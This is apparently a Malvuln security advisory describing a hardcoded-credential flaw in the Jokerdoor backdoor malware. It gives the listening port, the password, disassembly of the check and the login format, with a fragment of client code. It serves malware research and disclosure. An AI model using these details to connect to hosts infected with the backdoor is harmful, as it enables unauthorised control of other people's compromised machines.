Backdoor.Win32.Jokerdoor malware suffers from a hardcoded credential vulnerability.
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/a6437375fff871dff97dc91c8fd6259f.txt
Contact: [email protected]
Vulnerability: Weak Hardcoded Credentials
Vuln ID: MVID-2022-0531
Dropped files: Random name "awup.exe"
Description: The malware listens on TCP port 27374. The password "mathiasJ" is weak and hardcoded in the PE file. Failed authentication generates a "POPUP incorrect password..." message, using TELNET results in an error "PWDPerror reading password..." Using Nc64.exe utility results in a trailing line feed character "n" after the supplied password. This causes the cmp statement check to fail even if the password is correct due to the "n" character.
004BDA0C | 8B 45 EC | mov eax,dword ptr ss:[ebp-14] | [ebp-14]:" mathiasJn"
004BDA0F | 8B 15 0C AC 4D 00 | mov edx,dword ptr ds:[4DAC0C] | 004DAC0C:&"mathiasJ"
004041C7 | 39 D0 | cmp eax,edx | eax" mathiasJn", edx"mathiasJ"
So we will need to write a custom client ourselves. The password must also be sent with no space and prefixed with "PWD" E.g. "PWDmathiasJ". Upon successful authentication we get a message e.g. "PWDconnected time, date Legends 2.1".
from socket import *
res += s.recv(512)